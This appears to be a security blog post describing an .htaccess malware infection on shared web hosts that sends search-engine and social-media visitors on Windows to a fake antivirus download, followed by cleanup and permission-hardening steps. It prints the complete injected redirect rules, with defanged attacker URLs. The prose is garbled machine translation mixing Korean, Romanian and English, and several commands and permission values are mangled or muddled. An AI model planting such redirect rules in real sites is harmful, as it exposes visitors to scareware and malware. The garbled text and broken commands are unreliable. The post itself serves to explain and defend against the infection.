새로운 형태의 바이러스 despre care vad ca nu se stiu foarte multe, afecteaza site-uri hostate pe 신뢰할 수 없는 서버 사용자 계정/하위 도메인 계정이 가능한 곳 “보다” 그들 사이. More precisely, the hosting accounts are all placed in the folder “가상 호스트“, 그리고 저작권은 사용자 폴더 에서 “가상 호스트” 일반 사용자에게 제공됩니다.… 대부분의 상황에서 리셀러. It is a typical method of web servers that do not use WHM/c패널.
콘텐츠
.htaccess 바이러스의 활동 – .htaccess 해킹
바이러스 파일에 영향을 미침 .htaccess 피해자 사이트의 모습입니다. 라인이 추가됩니다 / 지령 할 것입니다 방문자 리디렉션 (veniti din yahoo, msn, google, facebook, yaindex, twitter, myspace, etc site-uri si portaluri cu trafic mare) catre niste site-uri care ofera “바이러스 백신 솔루션“. 그것은 약 가짜 바이러스 백신 솔루션, 내가 소개에서 쓴 내용 가짜 바이러스 백신 제거제.
다음은 다음과 같습니다. .htaccess 영향을 받음: (nu accesati URL-urile din continutul liniilor de mai jos)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine 켜기
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$[NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*메타크롤러.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavasurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavasurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Cei care folosesc WordPress vor gasi aceste linii in fisierul .htaccess 에서 public_html. In addition, the virus creates an identical .htaccess in the folder wp 콘텐츠.
*Sunt si situatii in care in loc de peoriavascularsurgery.com apare dns.thesoulfoodcafe.com 또는 다른 주소.
이 바이러스는 무엇을 하는가?
Odata redirectionat, vizitatorul este intampinat cu bratele deschise de mesajul :
경고!
귀하의 컴퓨터에는 다양한 바이러스 및 맬웨어 프로그램 존재 징후가 있습니다. 시스템에 즉각적인 안티 바이러스 검사가 필요합니다!
시스템 보안은 PC에서 바이러스 및 악성 프로그램을 무료로 신속하게 검사합니다.

Indiferent pe ce buton apasam, suntem dusi catre pagina de “내 컴퓨터“, 모방하기 위해 만들어짐 XP 디자인. 여기서는 자동으로 시작됩니다 “스캔 프로세스”, 결국 우리는 그것을 발견합니다 “우리는 감염되었습니다”.

Dupa ce apasam OK sau Cancel, va porni 다운로드파일의 setup.exe. 이것 setup.exe este falsul anti virus which affects the system. 감염된 링크를 추가로 전파하는 일련의 악성 프로그램 애플리케이션을 설치합니다. 소프트웨어 안티 바이러스 (또한 가짜) 피해자가 구매하도록 초대받은 것입니다.
이미 이 형태의 바이러스에 접촉한 적이 있는 사람은 이를 사용할 수 있습니다. 가짜 바이러스 백신 제거제. It is also recommended to scan the entire HDD. 추천하다 카스퍼 스키 인터넷 보안 또는 카스퍼스키 안티 바이러스.
이러한 형태의 바이러스는 운영 체제를 사용하는 방문자의 운영 체제에 영향을 미칩니다. 윈도우 XP, 윈도우 ME, 윈도우 2000, 윈도우 NT, 윈도우 98 및 Windows 95. 지금까지 Windows Vista 및 Windows 7 운영 체제의 감염 사례는 알려진 바 없습니다.
Cum putem elimina acest virus de .htaccess de pe server si cum putem preveni infectarea.
1. 파일 분석 및 의심스러운 코드 삭제. 파일뿐만 아니라 영향을 받는지 확인하려면 .htaccess 그것은 좋다 우리는 모든 파일을 분석합니다 .php 그리고 .js.
2. .htaccess 파일을 다시 작성하고 설정합니다. chmod 644 또는 744 쓰기 권한만 있음 사용자-ul 소유자.
3. Atunci cand se creaza un cont de hosting pentru un site, in folderul /집 또는 /웹루트 se va crea automat un folder care de cele mai multe ori are numele user-ului (cpanel, ftp 사용자, 등.). In order to prevent the writing of data and the transmission of viruses from one user to another, it is recommended to set on each user folder:
chmod 644 또는 744, 755 – 644로 표시됩니다.
chown -R 번호_사용자 번호_폴더.
chgrp -R 번호_사용자 번호_폴더
ls -모두 모드가 올바르게 설정되었는지 확인하십시오. 다음과 같은 내용이 나타나야 합니다.
drwx–엑스–x 12 dinamics dinamics 4096 5월 6일 14:51 dinamics/
drwx–엑스–x 10 duran duran 4096 3월 7일 07:46 duran/
drwx–엑스–x 12개의 시험관 시험관 4096 1월 29일 11:23 시험관/
drwxr-xr-x 14 익스프레스 익스프레스 4096 2009년 2월 26일 익스프레스/
drwxr-xr-x 9 그 4096 5월 19일 01:09 그/
drwx–엑스–x 9 farma farma 4096 Dec 19 22:29 farma/
In cazul in care unul din userele de mai sus va avea pe FTP fisiere virusate, 다른 호스팅 사용자에게 바이러스를 보낼 수 없습니다. 웹 서버에서 호스팅되는 계정을 보호하기 위한 최소한의 보안 조치입니다.
Elemente comune ale domeniilor afectate de acest tip de virus.
영향을 받는 모든 도메인은 방문자를 해당 도메인 이름이 포함된 사이트로 리디렉션합니다. “/main.php?e=4&시간“.
이것 “.htaccess 바이러스” afecteaza orice tip de CMS (줌라, 워드프레스, phpBB등)을 사용하는 .htaccess.
.htaccess 바이러스 해킹 & 리디렉션.
맬웨어 / 바이러스 – .htaccess "rewrite" & 리디렉션
에 대한 스텔스 L.P.
창립자 및 편집자 Stealth Settings, din 2006 pana in prezent. Experienta pe sistemele de operare Linux (in special CentOS), Mac OS X , Windows XP > Windows 10 Si WordPress (CMS).
Stealth L.P.의 모든 게시물 보기당신은 또한에 관심이있을 수 있습니다 ...
3가지 생각 “맬웨어 / 바이러스 – .htaccess "rewrite" & 리디렉션”